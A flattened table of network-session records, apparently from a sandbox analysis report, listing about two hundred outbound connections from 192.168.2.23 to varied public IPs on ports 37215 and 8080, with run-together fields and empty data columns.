                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22239192.168.2.2332978157.148.215.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22240192.168.2.235559842.136.226.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22241192.168.2.234373843.197.114.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22242192.168.2.2334336157.221.73.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22243192.168.2.2351250155.194.54.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22244192.168.2.2345558157.13.6.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22245192.168.2.2333986197.54.248.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22246192.168.2.2334448170.117.37.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22247192.168.2.234181841.179.192.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22248192.168.2.2343270197.88.17.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22249192.168.2.2336388157.8.24.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22250192.168.2.233607441.251.97.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22251192.168.2.2339880157.121.140.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22252192.168.2.235678241.22.87.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22253192.168.2.233371641.130.251.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22254192.168.2.2343160198.219.113.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22255192.168.2.2338894157.72.185.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22256192.168.2.233612241.161.21.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22257192.168.2.233603865.56.207.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22258192.168.2.2359026132.69.254.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22259192.168.2.2356910157.4.112.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22260192.168.2.2354270197.237.118.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22261192.168.2.233732441.172.173.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22262192.168.2.234106441.183.124.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22263192.168.2.2350666157.216.0.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22264192.168.2.2339902174.148.118.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22265192.168.2.2333260197.88.43.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22266192.168.2.235858841.132.93.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22267192.168.2.2359376157.229.13.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22268192.168.2.2338624197.234.118.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22269192.168.2.2350952197.35.73.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22270192.168.2.234065452.62.116.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22271192.168.2.2354786105.109.250.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22272192.168.2.234531841.102.239.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22273192.168.2.2350346197.132.229.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22274192.168.2.2340188157.104.73.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22275192.168.2.2351400157.216.111.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22276192.168.2.233850841.186.253.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22277192.168.2.2337434157.56.167.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22278192.168.2.2344212197.203.110.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22279192.168.2.2360460197.147.38.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22280192.168.2.235122073.7.16.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22281192.168.2.2338526157.249.188.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22282192.168.2.2334138197.189.20.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22283192.168.2.233981241.95.1.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22284192.168.2.235055241.57.74.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22285192.168.2.2343124197.114.238.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22286192.168.2.2352568197.46.181.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22287192.168.2.2359398122.190.137.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22288192.168.2.2355758157.94.106.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22289192.168.2.2349946197.39.178.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22290192.168.2.235858880.27.230.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22291192.168.2.2360790104.114.96.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22292192.168.2.2360556131.87.144.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22293192.168.2.2355288119.117.53.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22294192.168.2.235804041.146.25.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22295192.168.2.2349110157.243.75.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22296192.168.2.2337642201.228.98.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22297192.168.2.2334704157.225.1.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22298192.168.2.234598841.102.246.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22299192.168.2.2354724157.127.131.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22300192.168.2.2344528157.150.9.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22301192.168.2.2343834157.172.125.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22302192.168.2.2349324197.228.25.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22303192.168.2.2353366197.173.200.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22304192.168.2.2335122197.118.171.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22305192.168.2.2350868197.152.69.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22306192.168.2.235241866.205.244.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22307192.168.2.233758890.183.51.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22308192.168.2.2358628197.161.85.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22309192.168.2.2351014157.16.142.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22310192.168.2.2360420208.52.34.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22311192.168.2.2335564197.31.171.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22312192.168.2.2340046157.54.167.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22313192.168.2.2337980157.31.62.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22314192.168.2.233744841.92.116.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22315192.168.2.2346248122.221.137.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22316192.168.2.235088641.71.19.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22317192.168.2.2336492157.143.193.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22318192.168.2.2357224181.3.32.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22319192.168.2.233832441.110.116.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22320192.168.2.2352158157.236.30.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22321192.168.2.2339380157.169.72.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22322192.168.2.2354568132.235.202.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22323192.168.2.2360874107.205.195.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22324192.168.2.233719041.74.224.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22325192.168.2.234523085.234.219.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22326192.168.2.236099041.144.89.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22327192.168.2.2355138197.243.169.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22328192.168.2.2344108157.253.88.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22329192.168.2.2348662197.106.107.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22330192.168.2.2337634197.174.246.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22331192.168.2.234470853.213.111.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22332192.168.2.2344286157.1.48.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22333192.168.2.2343538130.13.136.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22334192.168.2.2341498157.224.74.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22335192.168.2.235832265.69.7.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22336192.168.2.233652641.243.89.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22337192.168.2.234959452.60.24.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22338192.168.2.235647262.58.115.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22339192.168.2.2340926169.187.81.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22340192.168.2.234684441.254.140.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22341192.168.2.235857279.252.46.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22342192.168.2.233807641.105.126.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22343192.168.2.2342376216.47.240.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22344192.168.2.2347578197.35.44.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22345192.168.2.2333636197.86.66.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22346192.168.2.2336350174.25.41.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22347192.168.2.2347338157.186.11.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22348192.168.2.2342608157.84.22.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22349192.168.2.233953441.64.81.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22350192.168.2.2360518197.111.172.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22351192.168.2.2360506150.58.208.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22352192.168.2.2355808197.168.155.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22353192.168.2.2347996157.160.212.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22354192.168.2.235013441.114.183.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22355192.168.2.2347692197.222.103.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22356192.168.2.2340134112.27.151.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22357192.168.2.2344896163.130.176.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22358192.168.2.234421041.138.41.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22359192.168.2.233480041.33.137.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22360192.168.2.235458241.191.108.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22361192.168.2.2335948216.165.194.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22362192.168.2.23418442.4.35.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22363192.168.2.234674827.218.137.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22364192.168.2.2358658118.49.63.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22365192.168.2.2344008219.183.37.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22366192.168.2.2335634152.41.253.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22367192.168.2.2345190172.146.62.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22368192.168.2.235952276.133.194.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22369192.168.2.2346080195.179.57.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22370192.168.2.234134223.186.202.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22371192.168.2.235313680.136.216.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22372192.168.2.233954287.23.64.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22373192.168.2.2360704187.133.232.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22374192.168.2.2355228189.54.215.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22375192.168.2.235047843.101.140.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22376192.168.2.235795497.225.40.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22377192.168.2.235257646.119.210.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22378192.168.2.233768678.7.4.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22379192.168.2.234050266.120.180.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22380192.168.2.2343004170.195.180.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22381192.168.2.2349158171.236.189.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22382192.168.2.233769294.83.88.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22383192.168.2.234977237.198.128.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22384192.168.2.2355250180.34.163.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22385192.168.2.2334000216.162.164.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22386192.168.2.235391638.33.126.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22387192.168.2.2340280143.14.253.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22388192.168.2.2336498109.67.104.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22389192.168.2.23572609.63.239.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22390192.168.2.2334858174.213.146.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22391192.168.2.2344790138.220.184.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22392192.168.2.2357436198.72.60.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22393192.168.2.2338708193.235.188.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22394192.168.2.2334550139.72.10.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22395192.168.2.235756498.159.245.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22396192.168.2.2358676184.4.139.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22397192.168.2.234227261.29.226.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22398192.168.2.2344738136.24.139.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22399192.168.2.234107688.147.53.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22400192.168.2.2343164101.98.220.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22401192.168.2.235803838.250.116.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22402192.168.2.2360086109.239.192.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22403192.168.2.2348808150.124.121.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22404192.168.2.2338990188.162.209.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22405192.168.2.2341226181.128.74.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22406192.168.2.2340664177.240.207.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22407192.168.2.2355678105.167.110.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22408192.168.2.235337685.79.182.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22409192.168.2.2346996109.21.200.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22410192.168.2.2345942115.254.13.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22411192.168.2.2346982188.229.88.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22412192.168.2.2354142104.149.158.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22413192.168.2.2339358175.15.192.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22414192.168.2.2350558192.246.208.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22415192.168.2.2360718136.116.51.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22416192.168.2.2335368218.168.182.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22417192.168.2.234613852.255.217.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22418192.168.2.234926697.247.175.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22419192.168.2.234044848.77.53.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22420192.168.2.2340770201.220.2.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22421192.168.2.2350346163.139.79.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22422192.168.2.233659674.66.119.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22423192.168.2.234225266.57.57.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22424192.168.2.2351800125.94.105.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22425192.168.2.233592636.215.238.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22426192.168.2.235487482.33.229.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22427192.168.2.2357982161.209.23.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22428192.168.2.233823461.116.64.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22429192.168.2.2341170178.12.133.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22430192.168.2.2348272114.123.79.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22431192.168.2.2346842195.229.100.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22432192.168.2.2335468105.195.160.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22433192.168.2.2335122155.120.4.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22434192.168.2.2360610141.199.24.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22435192.168.2.2358674162.194.48.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22436192.168.2.234303417.89.136.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22437192.168.2.233920058.146.25.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22438192.168.2.2348116170.107.2.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22439192.168.2.2350850132.17.115.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22440192.168.2.2338624176.79.226.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22441192.168.2.233376858.250.43.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22442192.168.2.235583451.80.220.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22443192.168.2.2340668213.246.55.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22444192.168.2.2348246211.145.215.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22445192.168.2.2350458137.154.181.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22446192.168.2.2347584180.141.221.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22447192.168.2.2338080176.247.230.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
